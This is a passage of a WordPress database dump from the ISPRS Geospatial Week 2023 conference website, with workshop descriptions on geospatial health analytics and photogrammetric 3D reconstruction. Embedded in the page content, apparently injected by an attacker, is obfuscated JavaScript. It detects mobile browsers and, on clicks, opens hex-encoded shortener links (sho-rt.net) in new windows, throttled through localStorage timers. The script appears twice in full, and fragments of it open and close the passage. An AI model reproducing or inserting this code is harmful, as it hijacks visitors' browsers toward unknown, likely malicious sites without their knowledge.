)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:18:48','2022-12-07 04:18:48','',3427,'https://gsw2023.com/?p=3445',0,'revision','',0),
(3446,1,'2022-12-07 04:19:35','2022-12-07 04:19:35','','w24m','','inherit','open','closed','','w24m-2','','','2022-12-07 04:19:35','2022-12-07 04:19:35','',3427,'https://gsw2023.com/wp-content/uploads/2022/12/w24m-1.jpg',0,'attachment','image/jpeg',0),
(3447,1,'2022-12-07 04:20:07','2022-12-07 04:20:07','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<p><strong>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li>Weilian Li<strong>, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:20:07','2022-12-07 04:20:07','',3427,'https://gsw2023.com/?p=3447',0,'revision','',0),
(3449,1,'2022-12-16 13:40:25','2022-12-16 13:40:25','[vc_row][vc_column][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)</strong></span></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\r\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2 style=\"text-align: left;\"><strong>CHAIRS</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5></h5>\r\n<h5></h5>\r\n<h5><u>Themes of event:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Novel approaches to image orientation</h6>\r\n</li>\r\n 	<li>\r\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\r\n</li>\r\n 	<li>\r\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\r\n</li>\r\n 	<li>\r\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\r\n</li>\r\n 	<li>\r\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\r\n</li>\r\n 	<li>\r\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5><u>Scientific Committee:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6>Ronny Hänsch, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Mozhdeh Shahbazi, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ewelina Rupnik, France</h6>\r\n</li>\r\n 	<li>\r\n<h6>Petra Helmholz, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Jianzhu Huai, China</h6>\r\n</li>\r\n 	<li>\r\n<h6>Michael Schmitt, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Dimitri Bulatov, Germany</h6>\r\n</li>\r\n 	<li>\r\n<h6>Saeid Homayouni, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>David Belton, Australia</h6>\r\n</li>\r\n 	<li>\r\n<h6>Ahmed Shaker, Canada</h6>\r\n</li>\r\n 	<li>\r\n<h6>Gunho Sohn, Canada</h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function 